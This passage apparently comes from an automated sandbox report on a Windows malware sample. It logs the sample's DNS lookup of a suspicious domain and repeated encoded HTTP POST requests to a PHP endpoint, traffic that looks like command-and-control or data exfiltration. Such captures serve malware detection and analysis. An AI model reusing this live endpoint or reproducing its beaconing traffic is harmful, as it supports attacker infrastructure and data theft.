                                                                                              Dec 9, 2024 16:02:07.778985977 CET804994637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:07.828423977 CET4994680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:07.918591976 CET804994537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:07.968996048 CET4994580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:08.171662092 CET804994637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:08.219054937 CET4994680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:08.352643013 CET4994580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:08.352665901 CET4994680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:08.353389025 CET4995180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:08.472953081 CET804994537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:08.473054886 CET4994580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:08.473494053 CET804995137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:08.473505974 CET804994637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:08.473577976 CET4995180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:08.473604918 CET4994680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:08.473742962 CET4995180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:08.593122005 CET804995137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:08.828561068 CET4995180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:08.948143005 CET804995137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:09.746181011 CET804995137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:09.797295094 CET4995180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:09.981959105 CET804995137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:10.031488895 CET4995180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:10.107765913 CET4995780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:10.227386951 CET804995737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:10.227507114 CET4995780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:10.227649927 CET4995780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:10.346936941 CET804995737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:10.578520060 CET4995780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:10.698091030 CET804995737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:11.573611021 CET804995737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:11.625245094 CET4995780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:11.799288034 CET804995737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:11.844057083 CET4995780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:11.919651031 CET4995780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:11.920125961 CET4996380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:12.039907932 CET804996337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:12.039926052 CET804995737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:12.040041924 CET4995780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:12.040199041 CET4996380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:12.040199041 CET4996380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:12.161654949 CET804996337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:12.390945911 CET4996380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:12.511185884 CET804996337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:12.923856974 CET4996580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:12.924108028 CET4996380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:13.047103882 CET804996537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:13.047168016 CET4996580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:13.047301054 CET4996580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:13.047504902 CET804996337.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:13.047547102 CET4996380192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:13.050934076 CET4996680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:13.167202950 CET804996537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:13.170758963 CET804996637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:13.170865059 CET4996680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:13.171066999 CET4996680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:13.290359020 CET804996637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:13.406625986 CET4996580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:13.516032934 CET4996680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:13.526386023 CET804996537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:13.526406050 CET804996537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:13.637332916 CET804996637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.318631887 CET804996537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.375247955 CET4996580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.442814112 CET804996637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.484654903 CET4996680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.553776026 CET804996537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.609652996 CET4996580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.677802086 CET804996637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.734625101 CET4996680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.794961929 CET4995180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.799699068 CET4996580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.799756050 CET4996680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.800350904 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.919770956 CET804996537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.919822931 CET4996580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.920146942 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.920216084 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.920418978 CET804996637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:14.920442104 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:14.920471907 CET4996680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:15.041776896 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:15.265995979 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:15.386554956 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:16.215329885 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:16.359622955 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.449781895 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:16.564675093 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.576666117 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.576775074 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.696156979 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:16.696261883 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.696295977 CET804997137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:16.696410894 CET4997180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.696455956 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:16.815879107 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:17.047188044 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:17.166712999 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:17.966264963 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:18.078701019 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.201807976 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:18.327599049 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.327601910 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.446980000 CET804998237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:18.447117090 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.447242022 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.448169947 CET804997737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:18.448275089 CET4997780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.566665888 CET804998237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:18.797169924 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:18.916510105 CET804998237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:19.564395905 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.564726114 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.683794975 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:19.683870077 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.683983088 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.684307098 CET804998237.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:19.684365034 CET4998280192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.689480066 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.803535938 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:19.810269117 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:19.810384035 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.810553074 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:19.930073977 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:20.032031059 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:20.151608944 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:20.151628971 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:20.159682035 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:20.279105902 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:20.967525959 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.062758923 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.082212925 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.185417891 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.250255108 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.250312090 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.321890116 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.451090097 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.451143026 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.454487085 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.571096897 CET804998537.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.571198940 CET4998580192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.572098017 CET804998637.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.572154045 CET4998680192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.574414015 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.574491024 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.574626923 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:21.694057941 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:21.924679041 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:22.044385910 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:22.844572067 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:23.062746048 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.077614069 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:23.225923061 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.250727892 CET4999780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.346431971 CET804999137.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:23.346515894 CET4999180192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.370650053 CET804999737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:23.370737076 CET4999780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.370908976 CET4999780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.490261078 CET804999737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:23.719099998 CET4999780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:23.838589907 CET804999737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:24.641576052 CET804999737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:24.820651054 CET4999780192.168.2.437.44.238.250
                                                                                              Dec 9, 2024 16:02:24.874121904 CET804999737.44.238.250192.168.2.4
                                                                                              Dec 9, 2024 16:02:24.937741995 CET4999780192.168.2.437.44.238.250

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Dec 9, 2024 16:00:30.972146988 CET5401253192.168.2.41.1.1.1
                                                                                              Dec 9, 2024 16:00:31.302555084 CET53540121.1.1.1192.168.2.4

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Dec 9, 2024 16:00:30.972146988 CET192.168.2.41.1.1.10x817eStandard query (0)306039cm.nyashcrack.topA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Dec 9, 2024 16:00:31.302555084 CET1.1.1.1192.168.2.40x817eNo error (0)306039cm.nyashcrack.top37.44.238.250A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • 306039cm.nyashcrack.top

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              0192.168.2.44973637.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:31.523606062 CET341OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 344
                                                                                              Expect: 100-continue
                                                                                              Connection: Keep-Alive
                                                                                              Dec 9, 2024 16:00:31.876008034 CET344OUTData Raw: 00 0a 04 02 06 00 01 01 05 06 02 01 02 07 01 00 00 06 05 0b 02 0c 03 0a 00 52 0d 57 06 01 06 03 0d 02 04 0a 02 0d 03 02 0e 00 07 51 05 53 02 05 06 06 0c 01 0e 01 01 00 01 05 07 01 05 0b 00 0a 00 51 0e 0d 07 00 04 04 0e 52 0e 57 0a 0d 0d 04 06 0d
                                                                                              Data Ascii: RWQSQRWV\L~^[ZwLP\a\hhRiMtpkcxDoUgl`zKmhNwIk\~_~V@AxCbLry
                                                                                              Dec 9, 2024 16:00:32.795283079 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:32.875606060 CET1236INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 1364
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 56 4a 7d 5e 6c 54 63 00 6c 5b 74 05 68 4f 7b 4b 7d 67 60 50 7f 4e 71 40 7b 70 60 04 7f 71 7f 5c 63 73 5c 53 6e 72 61 49 76 58 60 06 69 71 78 01 55 4b 72 50 77 4c 77 49 7d 72 7d 05 7d 67 71 50 7b 65 7c 0c 6a 63 59 05 77 71 72 5e 77 61 6e 59 6b 5f 76 05 7e 7c 70 09 6a 77 7f 02 77 66 7b 06 7c 5c 7d 05 7d 60 5b 01 79 67 55 5f 6f 01 77 5e 78 6d 78 5d 79 72 6c 01 6c 63 6e 07 6b 60 6c 07 7b 01 7c 44 7c 62 6f 03 75 58 7c 02 7a 51 41 5b 7d 77 68 09 7f 72 61 40 76 52 7f 5c 7b 6c 73 5c 77 4e 71 55 6e 71 7e 5d 69 6c 79 5d 6f 62 61 58 76 63 6f 4b 75 61 7f 5e 74 62 6e 50 7e 5d 7a 06 74 72 6d 04 76 65 68 09 7f 42 65 01 77 6f 70 04 7f 63 6c 06 78 6c 51 03 7b 4e 66 02 6b 6d 60 08 77 74 7c 04 7e 62 50 09 7e 53 7f 0c 6c 6e 7a 05 7d 71 79 02 7b 5d 46 51 7f 42 6f 53 7f 70 78 0a 7e 67 50 43 7a 6d 63 00 79 71 78 49 6b 58 64 59 6a 49 5d 08 7c 73 7d 0d 6d 60 6c 42 7e 62 63 59 60 5d 79 51 7b 5c 79 00 77 66 68 48 7d 48 5a 03 7e 48 53 0a 77 72 6b 4a 7c 72 69 07 7d 67 66 09 78 66 68 0a 7e 5d 6b 03 75 72 6d 03 74 5f 6d 02 7c 4f [TRUNCATED]
                                                                                              Data Ascii: VJ}^lTcl[thO{K}g`PNq@{p`q\cs\SnraIvX`iqxUKrPwLwI}r}}gqP{e|jcYwqr^wanYk_v~|pjwwf{|\}}`[ygU_ow^xmx]yrllcnk`l{|D|bouX|zQA[}whra@vR\{ls\wNqUnq~]ily]obaXvcoKua^tbnP~]ztrmvehBewopclxlQ{Nfkm`wt|~bP~Slnz}qy{]FQBoSpx~gPCzmcyqxIkXdYjI]|s}m`lB~bcY`]yQ{\ywfhH}HZ~HSwrkJ|ri}gfxfh~]kurmt_m|OjF}B|@}wwIwa{bS}NmIxghL{wtx}wFxbxx]v}p^KxIVD~Lg@vap~loKIpA}qmuR|{lVFwN~yqa~|vxavvswwa|vqf@|^vOtL}Bvux@B[BtBt|MZ{|wx^z}m`AtI^}Ln~CgB{}f~LiM|^R||~Nd@~w\NxmQJxb`K_w~YsA|^[{s^B~bpHwMuAyqWwv`}fp~X[wb{}rW}wfxf|}cwvLiOtOi~qT}lR}IUDuqg{Ly|`SxYpygt{Cz\|Izcb{]NZygwZir{uXl}UkYR|r}voZx|hw`Pn_SH}Rj_z\yvxBagx[L~Jx^q\tavf`hBStwXk]py|czp~h~lcY|O~aeSzSYQV~q\QfQgAVUo@dlgKWt[eVTlacrd^jk`KUszPWo_jaZZvKPrfG[uKjj{y[OQwbUqykjxXoPi]cHv\[crmhaq]~RViIQIaX{YzXKYinEUtAlU@nx]Tnc]Vf_}]pzYd\sNuLI~RQ[~p{VhbNZpoXToW`[Qf}zSZQLqkZ|Aqp{F]}\P}wyYcaBZyoVPoSZUo[P`FRY[aYe{UOZ^J_|u}VinOWqaXQaQ [TRUNCATED]
                                                                                              Dec 9, 2024 16:00:32.875722885 CET285INData Raw: 5d 68 61 09 42 50 7b 65 57 57 65 0c 5e 6a 05 0b 01 5a 58 6a 4f 5c 60 76 46 6b 72 66 58 7f 51 7f 6f 65 4a 7b 40 71 58 56 5c 57 05 7a 43 57 63 5c 43 54 5f 00 5e 54 00 6f 40 52 71 78 04 63 5b 73 45 6f 64 7e 00 7b 58 6f 46 57 6b 67 5f 69 75 74 63 5c
                                                                                              Data Ascii: ]haBP{eWWe^jZXjO\`vFkrfXQoeJ{@qXV\WzCWc\CT_^To@Rqxc[sEod~{XoFWkg_iutc\rsi`{UPh_cbU[UU\lkxBpYSUVvCWoWFWY[ZYbZ[[e}Sa[p\W\qXNQkfCZAkUFnxDWZaCPToL]v^RabQ|PQyz}Xja@P|gVSo_RswRkeo~gZy_xX}vx]idOS|fVU`SRqDc\Pbb_qX
                                                                                              Dec 9, 2024 16:00:32.915924072 CET317OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 384
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:00:33.265873909 CET384OUTData Raw: 59 5f 5e 50 5a 43 59 5c 5c 5c 56 57 50 5b 5b 51 5f 5a 59 5a 56 58 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y_^PZCY\\\VWP[[Q_ZYZVXQWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P B,-"!#%/2:4U<40]>27>Q<:'< ?:&^#,X +
                                                                                              Dec 9, 2024 16:00:33.329189062 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:33.766499996 CET308INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:32 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 152
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 0f 15 24 53 35 26 23 1d 36 38 3c 56 3a 03 3d 5a 22 3f 20 07 3f 2d 37 19 26 55 34 04 2c 2f 2d 0d 35 33 2a 5f 29 21 20 55 2b 0f 3f 0e 21 25 21 5a 06 1e 26 03 26 2e 20 1e 2e 21 3f 00 3f 32 2e 5c 23 10 2c 03 24 0d 23 0c 25 01 30 15 25 3f 3b 1b 2f 30 32 1e 29 07 23 44 3f 3c 33 10 27 15 2b 53 0e 1f 23 01 3e 21 32 0b 3f 3d 34 0d 20 3f 05 0a 31 58 36 51 27 31 3b 0d 28 14 3e 0e 3f 33 23 56 37 03 2c 51 26 02 29 5e 3f 06 2b 52 25 23 20 5e 22 0f 2f 52 00 31 5c 4d
                                                                                              Data Ascii: $S5&#68<V:=Z"? ?-7&U4,/-53*_)! U+?!%!Z&&. .!??2.\#,$#%0%?;/02)#D?<3'+S#>!2?=4 ?1X6Q'1;(>?3#V7,Q&)^?+R%# ^"/R1\M
                                                                                              Dec 9, 2024 16:00:33.869049072 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1748
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:00:34.219031096 CET1748OUTData Raw: 5c 5e 5b 56 5f 40 59 5f 5c 5c 56 57 50 5b 5b 5f 5f 5f 59 5d 56 5e 51 56 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: \^[V_@Y_\\VWP[[___Y]V^QVXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P /!6Z5*4729/($'(**%.#Y=+ D?<<&^#,X +
                                                                                              Dec 9, 2024 16:00:34.274930954 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:34.727336884 CET308INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 152
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 0f 15 27 0c 21 36 30 01 21 06 30 54 2c 2d 2d 5a 36 02 30 05 3f 3e 2c 06 31 33 05 5a 2c 2c 3a 51 20 30 2e 5a 3f 32 2b 0e 3e 22 28 1f 21 1f 21 5a 06 1e 26 00 30 13 3f 0d 3a 1c 24 1f 2b 31 22 5a 20 2e 01 5d 24 1d 28 54 25 01 20 1a 25 2f 0d 56 2f 0d 2a 57 2a 07 3c 18 3c 01 2b 58 27 05 2b 53 0e 1f 20 1f 3e 22 35 54 28 03 19 54 21 01 0e 10 25 10 3a 50 32 31 2c 16 28 2a 1c 0e 3f 23 1a 0d 20 13 37 0f 32 3c 3a 03 3c 01 0a 08 32 23 20 5e 22 0f 2f 52 00 31 5c 4d
                                                                                              Data Ascii: '!60!0T,--Z60?>,13Z,,:Q 0.Z?2+>"(!!Z&0?:$+1"Z .]$(T% %/V/*W*<<+X'+S >"5T(T!%:P21,(*?# 72<:<2# ^"/R1\M


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.44973737.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:33.342895031 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                              Host: 306039cm.nyashcrack.top
                                                                                              Content-Length: 1040
                                                                                              Expect: 100-continue
                                                                                              Dec 9, 2024 16:00:33.688447952 CET1040OUTData Raw: 59 5d 5e 5f 5a 43 59 5f 5c 5c 56 57 50 5d 5b 59 5f 59 59 59 56 53 51 56 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
                                                                                              Data Ascii: Y]^_ZCY_\\VWP][Y_YYYVSQVXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P C8 9"7,29=7'0^9=5* Y.*:<D+.0+*&^#,X 3
                                                                                              Dec 9, 2024 16:00:34.624191046 CET25INHTTP/1.1 100 Continue
                                                                                              Dec 9, 2024 16:00:34.858685970 CET158INHTTP/1.1 200 OK
                                                                                              Server: nginx
                                                                                              Date: Mon, 09 Dec 2024 15:00:33 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Length: 4
                                                                                              Connection: keep-alive
                                                                                              Data Raw: 3d 5d 5d 5a
                                                                                              Data Ascii: =]]Z


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.44973837.44.238.250808932C:\Users\user\Desktop\4si9noTBNw.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Dec 9, 2024 16:00:35.512751102 CET318OUTPOST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
